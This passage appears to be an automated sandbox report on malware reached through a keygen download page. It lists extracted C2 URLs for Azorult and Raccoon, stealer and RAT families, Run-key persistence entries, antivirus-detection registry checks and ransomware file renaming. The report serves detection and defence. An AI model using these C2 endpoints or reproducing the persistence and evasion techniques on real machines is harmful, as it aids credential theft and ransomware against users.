Resubmissions
10-04-2021 05:28
210410-642g16c6y6 1009-04-2021 16:57
210409-a3zwd3zjvx 1009-04-2021 05:30
210409-4qr2p4p1m6 10Analysis
-
max time kernel
1147s -
max time network
1149s -
submitted
01-01-0001 00:00
Static task
static1
URLScan task
urlscan1
Sample
https://keygenit.com/d/30f8668638112r4p2203.html
Behavioral task
behavioral1
Sample
https://keygenit.com/d/30f8668638112r4p2203.html
Resource
win10v20201028
Behavioral task
behavioral2
Sample
https://keygenit.com/d/30f8668638112r4p2203.html
Resource
win10v20201028
Behavioral task
behavioral3
Sample
https://keygenit.com/d/30f8668638112r4p2203.html
Resource
win10v20201028
General
-
Target
https://keygenit.com/d/30f8668638112r4p2203.html
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
C:\_readme.txt
https://we.tl/t-KjQSp1t0OY
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
a6bfe7e504db71e25642b830fd9b2c4366cf882a
-
url4cnc
https://telete.in/j90dadarobin
Extracted
icedid
1925120085
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 6652 created 8852 6652 WerFault.exe 596 -
Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
description pid Process procid_target PID 4756 created 5252 4756 svchost.exe 189 PID 4756 created 6228 4756 svchost.exe 297 PID 4756 created 7564 4756 svchost.exe 512 PID 4756 created 7268 4756 svchost.exe 559 PID 4756 created 9868 4756 svchost.exe 592 PID 4756 created 8704 4756 svchost.exe 618 PID 4756 created 5812 4756 svchost.exe 643 PID 4756 created 10956 4756 svchost.exe 680 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Blocklisted process makes network request 28 IoCs
flow pid Process 235 6236 cmd.exe 249 6236 cmd.exe 252 6236 cmd.exe 284 6684 MsiExec.exe 287 6684 MsiExec.exe 300 6684 MsiExec.exe 305 6684 MsiExec.exe 308 6684 MsiExec.exe 305 6684 MsiExec.exe 305 6684 MsiExec.exe 284 6684 MsiExec.exe 287 6684 MsiExec.exe 308 6684 MsiExec.exe 308 6684 MsiExec.exe 472 5364 powershell.exe 300 6684 MsiExec.exe 829 6752 rundll32.exe 830 6752 rundll32.exe 833 6752 rundll32.exe 835 6752 rundll32.exe 836 6752 rundll32.exe 837 6752 rundll32.exe 838 6752 rundll32.exe 842 6752 rundll32.exe 871 6752 rundll32.exe 906 6752 rundll32.exe 948 9252 msiexec.exe 1178 9028 msiexec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ysAGEL.exe File opened for modification C:\Windows\System32\drivers\SETCC1B.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETCC1B.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\system32\drivers\etc\hosts alpATCHInO.exe -
Executes dropped EXE 64 IoCs
pid Process 5072 keygen-pr.exe 4492 keygen-step-1.exe 3732 keygen-step-2.exe 3988 keygen-step-3.exe 2096 keygen-step-4.exe 4836 key.exe 2608 Setup.exe 5100 multitimer.exe 4272 setups.exe 4788 Full Version.exe 4056 setups.tmp 2328 59E.tmp.exe 4744 askinstall20.exe 1400 multitimer.exe 3152 multitimer.exe 4816 mt1fu32iu4k.exe 1488 mt1fu32iu4k.tmp 2476 ywjzhunjyey.exe 5140 KiffApp1.exe 5188 vpn.exe 5220 cmd.exe 5228 vpn.tmp 5252 app.exe 5288 Conhost.exe 5300 Setup3310.tmp 5344 apipostback.exe 5408 zjqs2pkwltw.exe 5524 taskkill.exe 6236 cmd.exe 6352 Setup.exe 6452 hjjgaa.exe 6460 RunWW.exe 6484 jg7_7wjg.exe 6492 guihuali-game.exe 6500 Three.exe 6508 LabPicV3.exe 6528 RunWW.exe 6608 dw20.exe 6652 LabPicV3.tmp 6676 XOoRXgN90WGr.exe 6692 Raw4vpn.exe 6708 lylal220.tmp 6956 md2_2efs.exe 7060 jfiag3g_gg.exe 5180 Geqymilace.exe 6424 setups.exe 2804 setups.tmp 7140 ysAGEL.exe 5820 alpATCHInO.exe 504 jfiag3g_gg.exe 7036 jfiag3g_gg.exe 6812 app.exe 7024 multitimer.exe 6636 prolab.exe 5052 irecord.exe 5580 Naebuvulaene.exe 6532 irecord.tmp 5312 prolab.tmp 5180 Geqymilace.exe 5264 Gaesojahure.exe 4800 Lyjylokulae.exe 6596 multitimer.exe 6936 i-record.exe 6232 gaooo.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\InvokeRequest.tif => C:\Users\Admin\Pictures\InvokeRequest.tif.lmas 9C8.exe File opened for modification C:\Users\Admin\Pictures\FindAdd.tiff 9C8.exe File renamed C:\Users\Admin\Pictures\GrantClose.tiff => C:\Users\Admin\Pictures\GrantClose.tiff.lmas 9C8.exe File opened for modification C:\Users\Admin\Pictures\GrantClose.tiff 9C8.exe File renamed C:\Users\Admin\Pictures\MountDisable.png => C:\Users\Admin\Pictures\MountDisable.png.lmas 9C8.exe File renamed C:\Users\Admin\Pictures\RenamePublish.raw => C:\Users\Admin\Pictures\RenamePublish.raw.lmas 9C8.exe File renamed C:\Users\Admin\Pictures\ResizeRename.png => C:\Users\Admin\Pictures\ResizeRename.png.lmas 9C8.exe File renamed C:\Users\Admin\Pictures\CompleteSelect.png => C:\Users\Admin\Pictures\CompleteSelect.png.lmas 9C8.exe File renamed C:\Users\Admin\Pictures\FindAdd.tiff => C:\Users\Admin\Pictures\FindAdd.tiff.lmas 9C8.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation keygen-step-4.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation BTRSetp.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation keygen-step-4.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Weather.exe -
Loads dropped DLL 64 IoCs
pid Process 4056 setups.tmp 4056 setups.tmp 4056 setups.tmp 4056 setups.tmp 4056 setups.tmp 4056 setups.tmp 4056 setups.tmp 4232 Conhost.exe 1488 mt1fu32iu4k.tmp 5300 Setup3310.tmp 5300 Setup3310.tmp 5408 zjqs2pkwltw.exe 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5944 MsiExec.exe 5944 MsiExec.exe 5944 MsiExec.exe 6708 lylal220.tmp 6652 LabPicV3.tmp 6812 app.exe 6832 regsvr32.exe 6684 MsiExec.exe 6684 MsiExec.exe 6684 MsiExec.exe 6684 MsiExec.exe 6792 rundll32.exe 6684 MsiExec.exe 6684 MsiExec.exe 2804 setups.tmp 2804 setups.tmp 2804 setups.tmp 2804 setups.tmp 2804 setups.tmp 2804 setups.tmp 2804 setups.tmp 6528 RunWW.exe 6528 RunWW.exe 2328 59E.tmp.exe 6684 MsiExec.exe 6684 MsiExec.exe 6684 MsiExec.exe 6684 MsiExec.exe 2328 59E.tmp.exe 2328 59E.tmp.exe 2328 59E.tmp.exe 2328 59E.tmp.exe 6936 i-record.exe 6936 i-record.exe 6936 i-record.exe 6936 i-record.exe 6936 i-record.exe 6936 i-record.exe 6936 i-record.exe 6936 i-record.exe 6936 i-record.exe 6940 Setup3310.tmp 6940 Setup3310.tmp 6888 vpn.tmp -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 8628 icacls.exe 8308 icacls.exe 5272 icacls.exe 4124 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 26 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\i5hkmbwm4es = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\T7P6G3LPC4\\multitimer.exe\" 1 3.1617987577.607087f9defe7" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\PULServices.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\PULServices.exe" PULServices.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\PULServices.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\PULServices.exe" PULServices.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\WUFServices.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WUFServices.exe" WUFServices.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2DDB.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" 2DDB.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\SHoliqolulu.exe\"" ysAGEL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Lofadilymu.exe\"" alpATCHInO.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\3nwdrugidqg = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\BR8QCOXSRF\\multitimer.exe\" 1 3.1617987860.60708914f1a1d" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" app.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\WUFServices.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WUFServices.exe" WUFServices.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\t1w2ir2fbzi = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\069BJF9LQ6\\multitimer.exe\" 1 3.1617987939.60708963c6c65" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8065b13e-c302-4ea8-9d27-9b2555360c2b\\9C8.exe\" --AutoStart" 9C8.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\emdjlfnjm0s = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\SE6WNMAAYG\\multitimer.exe\" 1 3.1617987546.607087da3fb62" multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --anbfs" Weather_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\WUFServices.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WUFServices.exe" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\PULServices.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\PULServices.exe" xmrmin.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\WUFServices.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WUFServices.exe" ethminer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\p4iqilsuvt5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Y16O0ASUE9\\multitimer.exe\" 1 3.1617987891.6070893357afd" multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run app.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 1072282.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Weather_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\PULServices.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\PULServices.exe" PULServices.exe -
Checks for any installed AV software in registry 1 TTPs 64 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Weather.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg8_8qyu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7BEF.tmp.exe -
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json askinstall20.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: zjqs2pkwltw.exe File opened (read-only) \??\M: zjqs2pkwltw.exe File opened (read-only) \??\R: zjqs2pkwltw.exe File opened (read-only) \??\V: zjqs2pkwltw.exe File opened (read-only) \??\X: zjqs2pkwltw.exe File opened (read-only) \??\Y: zjqs2pkwltw.exe File opened (read-only) \??\G: zjqs2pkwltw.exe File opened (read-only) \??\J: zjqs2pkwltw.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: zjqs2pkwltw.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\S: zjqs2pkwltw.exe File opened (read-only) \??\T: zjqs2pkwltw.exe File opened (read-only) \??\U: zjqs2pkwltw.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\L: zjqs2pkwltw.exe File opened (read-only) \??\O: zjqs2pkwltw.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Q: zjqs2pkwltw.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: zjqs2pkwltw.exe File opened (read-only) \??\I: zjqs2pkwltw.exe File opened (read-only) \??\W: zjqs2pkwltw.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: zjqs2pkwltw.exe File opened (read-only) \??\H: zjqs2pkwltw.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: zjqs2pkwltw.exe File opened (read-only) \??\N: zjqs2pkwltw.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: zjqs2pkwltw.exe File opened (read-only) \??\P: zjqs2pkwltw.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1135 api.2ip.ua 1172 api.ipify.org 1227 api.2ip.ua 374 ip-api.com 404 ipinfo.io 1175 ipinfo.io 213 ipinfo.io 216 ipinfo.io 256 ip-api.com 413 ipinfo.io 830 ipinfo.io 945 api.ipify.org 1020 ipinfo.io 1136 api.2ip.ua -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 23 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\TASKDIRFORTASKCREATE\TASKFORTASKCREATE svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent E366E9C8F7F2D4DF svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{42850d0b-885c-1944-b4d1-9e3f8445517f}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{42850d0b-885c-1944-b4d1-9e3f8445517f}\SETC8A2.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{42850d0b-885c-1944-b4d1-9e3f8445517f}\SETC8A2.tmp DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{42850d0b-885c-1944-b4d1-9e3f8445517f} DrvInst.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\VC2EYZQA.cookie svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\VC2EYZQA.cookie svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{42850d0b-885c-1944-b4d1-9e3f8445517f}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF jfiag3g_gg.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\System32\DriverStore\Temp\{42850d0b-885c-1944-b4d1-9e3f8445517f}\SETC8A0.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{42850d0b-885c-1944-b4d1-9e3f8445517f}\SETC8A1.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{42850d0b-885c-1944-b4d1-9e3f8445517f}\SETC8A1.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{42850d0b-885c-1944-b4d1-9e3f8445517f}\SETC8A0.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{42850d0b-885c-1944-b4d1-9e3f8445517f}\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 8140 Conhost.exe 7848 mask_svc.exe 3856 mask_svc.exe -
Suspicious use of SetThreadContext 19 IoCs
